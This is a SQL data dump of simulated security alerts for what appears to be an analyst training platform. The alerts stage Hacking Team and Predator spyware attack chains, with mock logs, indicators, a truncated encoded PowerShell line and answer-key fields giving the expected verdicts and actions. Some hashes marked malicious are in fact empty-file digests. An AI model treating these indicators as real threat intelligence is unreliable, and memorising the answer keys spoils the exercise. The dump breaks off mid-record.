INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1512, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Anomalous traffic from an external IP address has been detected entering the Hacking Team network, indicating a potential unauthorized access attempt. The traffic pattern suggests initial access efforts to compromise the network perimeter.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T02:35:27Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":3389,\"alert_signature\":\"Suspicious RDP Traffic\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"payload.exe\"}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal server used for RDP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in recent attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Executable file used to deploy malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1513, 'Execution of Malicious Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, the attacker executes a malicious payload designed to exploit zero-day vulnerabilities within the network. The payload is identified to be associated with known APT tactics.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"event_id\":\"EDR-2023-0912\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"user\":\"jdoe\",\"filename\":\"malicious_payload.exe\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"event_type\":\"execution\",\"process_command_line\":\"C:\\\\malicious_payload.exe --exploit\",\"severity\":\"high\",\"indicators\":{\"ip\":\"203.0.113.45\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"jdoe\"}}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload used by APT.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Regular user account within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1514, 'Establishing Persistent Access', 'high', 'System Logs', 'The attacker has successfully established persistence on the compromised system by installing a backdoor and creating a scheduled task. This allows them to maintain access despite security controls.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.25\",\"destination_ip\":\"10.0.0.45\",\"username\":\"admin_user\",\"process_name\":\"backdoor.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"scheduled_task\":\"persistent_task\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"event_description\":\"Scheduled Task Created for Persistence\"}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Filename used by malware to maintain persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Privileged account used to schedule the task.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1515, 'Lateral Movement Across Networks', 'high', 'Internal Network Monitoring', 'Using established persistence, the attacker moves laterally through the network, accessing sensitive data and systems within the Hacking Team infrastructure.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"LM-20231012-003\",\"source_ip\":\"10.1.2.15\",\"destination_ip\":\"10.1.3.45\",\"malicious_ip\":\"185.143.223.45\",\"username\":\"j.doe\",\"file_hash\":\"d9f8eea7be5c3c1d4f1057a3b8cabf3c\",\"filename\":\"malicious_payload.exe\",\"action\":\"File Transfer\",\"protocol\":\"SMB\",\"network_context\":{\"internal_network\":\"Hacking Team\",\"external_network\":\"Internet\"}}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.3.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.143.223.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d9f8eea7be5c3c1d4f1057a3b8cabf3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash of known malicious payload used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal HR records\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1516, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) System', 'The final stage of the attack involves exfiltrating critical data, including zero-day vulnerabilities and customer lists, posing a significant risk to the surveillance industry.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:58Z\",\"alert_id\":\"DL-2023-EXFIL-0005\",\"detected_action\":\"Data Exfiltration\",\"source_ip\":\"192.168.45.12\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filehash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"customer_list_secret.xlsx\",\"protocol\":\"HTTPS\",\"exfiltration_size\":\"2.5GB\",\"malware_associated\":false,\"internal_network\":true}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP has been associated with multiple exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of suspected compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with frequent DLP alerts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Records\",\"verdict\":\"clean\",\"details\":\"Active employee, but credentials may be compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"customer_list_secret.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file flagged for unusual access and transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1517, 'Suspicious Email Attachment Detected', 'medium', 'Email gateway logs', 'A phishing email containing a seemingly harmless attachment was detected. This is the initial access point for the Predator spyware deployment.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:45:00Z\",\"email_id\":\"5f8e2b7d-4c7a-4b29-b2e1-1fb0a5b4c3d5\",\"sender\":\"attacker@example.com\",\"recipient\":\"victim@company.com\",\"subject\":\"Urgent: Invoice Attached\",\"attachment\":\"invoice123.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"file_analysis\":{\"detected\":true,\"malware_family\":\"Predator\",\"file_behavior\":\"drops malicious payload\"}}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Email address associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice123.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File used in phishing email\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Predator malware\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address involved in previous phishing attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-03-15T20:58:15.332Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1518, 'Zero-click Exploit Triggered', 'critical', 'Endpoint detection and response (EDR) tool', 'A sophisticated zero-click exploit is triggered, allowing the Predator spyware to execute on the target\'s device without any user interaction.', 'Remote Code Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:05Z\",\"event_type\":\"exploit_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":445,\"malware_name\":\"Predator\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"predator_exploit_payload.dll\",\"username\":\"jdoe\",\"device_id\":\"EDR-001234\",\"signature_id\":\"EXP-2023-0001\",\"exploit_method\":\"zero-click\"}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with zero-click exploit attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Predator spyware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"predator_exploit_payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis System\",\"verdict\":\"malicious\",\"details\":\"Filename used in multiple exploit campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1519, 'Spyware Establishes Persistence', 'high', 'System registry analysis', 'Once executed, the Predator spyware establishes persistence on the device, ensuring it remains active even after reboots. The registry key modification is a common persistence mechanism.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:32:45Z\",\"event_type\":\"registry_modification\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\predator\",\"registry_value\":\"C:\\\\Program Files\\\\Predator\\\\predator.exe\",\"user\":\"admin_user\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"host_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"predator.exe\"}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"IP belongs to the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Predator spyware 